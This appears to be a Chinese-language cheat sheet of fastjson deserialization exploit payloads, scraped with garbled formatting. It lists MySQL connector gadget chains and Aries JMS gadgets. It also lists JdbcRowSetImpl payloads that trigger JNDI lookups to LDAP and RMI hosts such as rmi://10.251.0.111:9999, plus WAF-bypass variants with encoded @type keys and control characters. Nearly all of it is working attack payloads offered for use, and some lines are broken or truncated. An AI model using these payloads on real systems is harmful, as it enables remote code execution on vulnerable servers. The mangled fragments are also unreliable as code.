1 2 3 4 5 6 7 8 Mysqlconnector 5.1 .x{ "@type" : "java.lang.AutoCloseable" , "@type" : "com.mysql.jdbc.JDBC4Connection" , "hostToConnectTo" : "mysql.host" , "portToConnectTo" : 3306 , "info" : { "user" : ”user"," password":" pass"," statementInterceptors":" com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor"," autoDeserialize":" true "," NUM_HOSTS": " 1 "}," databaseToConnectTo":" dbname"," url":" "} Mysqlconnector 6.0.2 or 6.0.3 {" @type": " java.lang.AutoCloseable"," @type": " com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection"," proxy":{" connectionString":{" url": " jdbc: mysql: 6. x or < 8.0 .20 { "@type" : "java.lang.AutoCloseable" , "@type" : "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection" , "proxy" : { "@type" : "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy" , "connectionUrl" : { "@type" : "com.mysql.cj.conf.url.ReplicationConnectionUrl" , "masters" : [ { "host" : "mysql.host" } ] , "slaves" : [ ] , "properties" : { "host" : "mysql.host" , "user" : "user" , "dbname" : "dbname" , "password" : "pass" , "queryInterceptors" : "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor" , "autoDeserialize" : "true" } } } }
fastjson<=1.2.68 fastjson 未知版本 待探索
1 2 3 { "@type" : "org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory" , "tmJndiName" : "ldap://localhost:1389/Exploit" , "tmFromJndi" : true , "transactionManager" : { "$ref" : "$.transactionManager" } } { "@type" : "org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory" , "tmJndiName" : "ldap://localhost:1389/Exploit" , "tmFromJndi" : true , "transactionManager" : { "$ref" : "$.transactionManager" } }
fastjson < 1.2.83
具体版本1.2.76 <= fastjson < 1.2.83
依赖groovy
具体参考https://github.com/Lonely-night/fastjsonVul
bypasswaf 绕过 WAF ,在部分中间件中,multipart 支持指定 Content-Transformer-Encoding
1 [ 11111111111111111111111111111111111 , [ 11111111111111111111111111111111111. .. , [ 11111111111111111111111111111111111. .. , [ 11111111111111111111111111111111111. .. , [ 11111111111111111111111111111111111. .. , ..., { '\x40\u0074\x79\u0070\x65': xjava.lang.AutoCloseable"... ]]]]]
各种特性
1 , new: [ NaN, x'00 ', { , '\x40\u0074\x79\u0070\x65': xjava.lang.AutoClosea ble"
文章推荐:https://www.sec-in.com/article/950 \b、\n、\r、\f等,同时还会自动将键与值进行unicode与十六进制解码。
1 2 3 4 5 6 7 8 9 10 11 { "@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "rmi://10.251.0.111:9999" , "autoCommit" : true } { "@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "rmi://10.251.0.111:9999" , "autoCommit" : true } { "@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "rmi://10.251.0.111:9999" , "autoCommit" : true } { \n"@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "rmi://10.251.0.111:9999" , "autoCommit" : true } { "@type" \b: "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "rmi://10.251.0.111:9999" , "autoCommit" : true } { "\u0040\u0074\u0079\u0070\u0065" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "rmi://10.251.0.111:9999" , "autoCommit" : true } { "\x40\x74\x79\x70\x65" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "rmi://10.251.0.111:9999" , "autoCommit" : true }